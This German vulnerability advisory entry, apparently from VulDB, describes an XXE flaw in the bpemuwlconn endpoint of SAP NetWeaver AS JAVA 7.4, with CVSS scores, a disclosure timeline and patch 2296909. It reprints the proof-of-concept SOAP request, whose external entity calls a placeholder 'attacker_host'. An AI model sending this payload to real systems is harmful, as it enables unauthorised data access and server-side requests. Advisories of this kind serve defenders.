📚 SAP NetWeaver AS JAVA 7.4 BC-BMT-BPM-DSK bpemuwlconn erweiterte Rechte

🕛 Zeit seit Veröffentlichung: 2705 Tage, 18 Stunden 55 Minuten
📆 Veröffentlicht am: 21.11.2016 um 01:00 Uhr
💡 Newskategorie: Sicherheitslücken
🔗 Quelle: vuldb.com

In SAP NetWeaver AS JAVA 7.4 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Hierbei betrifft es eine unbekannte Funktion der Datei /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn der Komponente BC-BMT-BPM-DSK. Durch Manipulieren mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle (XXE) ausgenutzt werden. Die Auswirkungen sind bekannt für Vertraulichkeit, Integrität und Verfügbarkeit.

Die Schwachstelle wurde am 21.11.2016 durch Vahagn Vardanyan als [ERPSCAN-16-034] SAP NetWeaver AS JAVA - XXE vulnerability in BC-BMT-BPM-DSK component / 2296909 in Form eines bestätigten Mailinglist Posts (Bugtraq) öffentlich gemacht. Bereitgestellt wird das Advisory unter seclists.org. Die Veröffentlichung passierte hierbei in Koordination mit SAP. Sie gilt als schwierig ausnutzbar. Der Angriff kann über das Netzwerk angegangen werden. Das Ausnutzen erfordert eine einfache Authentisierung. Es sind technische Details sowie ein öffentlicher Exploit zur Schwachstelle bekannt.

Ein öffentlicher Exploit wurde durch Vahagn Vardanyan programmiert und sofort nach dem Advisory veröffentlicht. Er wird als proof-of-concept gehandelt. Der Exploit wird unter seclists.org zur Verfügung gestellt. Mindestens 256 Tage galt die Schwachstelle als nicht öffentlicher Zero-Day. Während dieser Zeit erzielte er wohl etwa $5k-$25k auf dem Schwarzmarkt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host";>
]><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/";
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/";
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
xmlns:xsd="http://www.w3.org/2001/XMLSchema";>

   <SOAP-ENV:Body>

       <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>

   &xxe;</SOAP-ENV:Body>

</SOAP-ENV:Envelope>

Die Schwachstelle lässt sich durch das Einspielen des Patches 2296909 lösen.

CVSSv3

Base Score: 5.0 [?]
Temp Score: 4.5 [?]
Vector: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C [?]
Zuverlässigkeit: High

CVSSv2

Base Score: 4.6 (CVSS2#AV:N/AC:H/Au:S/C:P/I:P/A:P) [?]
Temp Score: 3.6 (CVSS2#E:POC/RL:OF/RC:C) [?]
Zuverlässigkeit: High

CPE

• cpe:/a:sap:netweaver_as_java:7.4

Exploiting

Klasse: Erweiterte Rechte
Lokal: Nein
Remote: Ja

Verfügbarkeit: Ja
Zugang: öffentlich
Status: Proof-of-Concept
Autor: Vahagn Vardanyan
Download: seclists.org

Aktuelle Preisschätzung: $0-$5k (0-day) / $0-$5k (Heute)

Gegenmassnahmen

Empfehlung: Patch
Status: Offizieller Fix
0-Day Time: 256 Tage seit gefunden
Exploit Delay Time: 0 Tage seit bekannt

Patch: 2296909

Timeline

10.03.2016 Hersteller informiert
10.03.2016 Hersteller bestätigt
21.11.2016 Advisory veröffentlicht
21.11.2016 Exploit veröffentlicht
21.11.2016 VulDB Eintrag erstellt
21.11.2016 VulDB letzte Aktualisierung

Quellen

Advisory: [ERPSCAN-16-034] SAP NetWeaver AS JAVA - XXE vulnerability in BC-BMT-BPM-DSK component / 2296909
Person: Vahagn Vardanyan
Status: Bestätigt
Koordiniert: Ja

Eintrag

Erstellt: 21.11.2016
Eintrag: 80.3% komplett
...